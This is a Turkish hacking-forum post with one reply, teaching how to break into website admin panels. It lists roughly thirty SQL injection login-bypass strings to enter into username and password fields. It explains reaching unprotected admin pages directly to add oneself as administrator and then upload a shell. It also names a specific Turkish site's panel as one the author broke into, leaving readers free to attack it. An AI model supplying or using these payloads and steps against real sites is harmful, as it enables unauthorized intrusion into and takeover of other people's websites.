Hedef Site Admin Panel Girme Taktikleri

LweN

Silver Member
Silver
Elit
Katılım
25 Kas 2019
Mesajlar
111
Puanları
28
1. Login Bypass Açığı

Yılların eskittiği ama hala yeni başlayan 200-300 tl tema yazanların sık sık düştüğü gerekli filtremelerin yapılmadığı zaman admin paneline bu kodları yazdığımızda erişimimizi sağlayan k
odlardır. Açık mevcutsa Aşağıda belirteceğim kodları admin panelinde kullanıcı adı ve şifre kısmına yazıp giriş yapabilirsiniz.

Kod:
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1 <
' or 1=1 or ''='
" or 1=1 or ""="   
'or'1!=TheSprit
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--
2. Kullanıcı Girişi yapmadan Admin Paneline girme


Eee bilader nasıl olacak bu dediğinizi duyar gibiyim admin panelini yazan yazılımcı çaylaksa sesion vb kullanıp kullanıcı girişini kontrol ettirip eğer kullanıcı girişi yoksa login.php sayfasına gitmesi için kod yazmadıysa direk admin paneline ulaşabilirsiniz.



http://www.hedefsite.com.tr/panel/index.php


Püf noktası : İntratemper tarzı sitedeki dosyaları tarayan programlarla admin klasöründeki dosyaların adına erişebilirseniz de bu işlemi yapabilirsiniz yani mesala adminekle.php diye dosyam var ama bunda da aynı şekilde kullanıcı girişini kontrol etmeden yazdıysa

http://www.hedefsite.com.tr/panel/adminekle.php yazarak kendinizi admin olarak ekliyebilirsiniz sonra shellinizi vb upload edebilirsiniz.

Şurayada bu şekilde girdiğim bir tr site atıyorum hacklemenizi tavsiye etmem yinede siz bilirsiniz tabi ben sadece size bunun neden olduğunu neler yapılabileceğini anlattım ister php kodlarken dikkat edin ister sitelere girip basın orası size kalmış



http://www.dogasolar.com.tr/panel/giris.php
eline sağlık güzel
 
Üst